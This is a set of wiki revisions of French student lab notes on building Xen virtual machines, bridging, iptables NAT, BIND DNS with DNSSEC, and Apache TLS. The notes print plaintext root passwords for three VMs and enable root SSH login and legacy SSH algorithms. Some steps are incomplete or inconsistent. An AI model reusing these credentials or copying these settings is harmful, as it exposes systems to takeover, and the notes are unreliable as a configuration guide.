</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12120
Atelier SysRes SE4 2025/2026 E5
2026-02-09T14:58:43Z
<p>Cpayet : /* Nos résultats : */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
<br />
<br />
476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3<br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11992
Atelier SysRes SE4 2025/2026 E5
2026-02-02T07:53:15Z
<p>Cpayet : /* Utiles */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
